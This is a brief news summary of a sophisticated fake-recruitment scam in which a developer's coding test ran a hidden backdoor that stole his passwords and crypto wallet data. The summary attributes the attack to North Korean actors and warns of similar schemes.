A web developer in Serbia fell victim to a highly sophisticated job scam that began with a LinkedIn message from a fake blockchain company called Genusix Labs. The scam involved camera-on Zoom interviews with convincing fake employees, jokes about backdoors to lower his guard, and a malicious coding test hidden inside a dependency chain. Running the code triggered a shell script that downloaded a Go-based backdoor with RC4-encrypted communications, capable of stealing Chrome passwords, macOS Keychain data, crypto wallets, and more. In just 56 seconds before the developer killed his Wi-Fi, attackers collected 634 saved passwords and his MetaMask wallet data. Blockchain intelligence firm zeroShadow linked the attack to North Korean government-affiliated actors, the same group behind a prior $40M crypto heist at his former employer. The developer warns that scams are evolving toward full fake onboarding scenarios that could compromise CI/CD pipelines and developer registries.
Sort: